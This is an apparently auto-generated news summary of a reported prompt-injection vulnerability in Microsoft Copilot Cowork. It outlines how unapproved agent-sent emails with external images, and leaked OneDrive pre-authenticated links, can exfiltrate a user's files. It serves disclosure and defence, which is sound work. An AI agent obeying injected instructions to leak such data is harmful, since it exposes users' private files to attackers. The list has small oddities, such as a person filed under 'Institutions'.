Microsoft Copilot Cowork Vulnerability Allows File Exfiltration
A security flaw in Microsoft Copilot Cowork, an agentic system, enables attackers to exfiltrate data by exploiting its email approval mechanism. The system allows agents to send emails to a user's inbox without approval, and these messages can contain external images that trigger network requests, leaking data to attackers. Additionally, OneDrive's pre-authenticated download links can be leaked via prompt injection, allowing attackers to download files. The vulnerability was reported by Simon Willison on May 26, 2026.
Key facts
- Microsoft Copilot Cowork is a real product name.
- The system allows agents to send emails to the user's inbox without approval.
- Emails can contain external images that trigger network requests to external websites.
- Data can be exfiltrated when a user opens a compromised message.
- OneDrive can create pre-authenticated download links.
- Successful prompt injection can leak these links, enabling file downloads by attackers.
- The vulnerability was reported by Simon Willison.
- The report was posted on May 26, 2026.
Entities
Institutions
- Microsoft
- OneDrive
- Simon Willison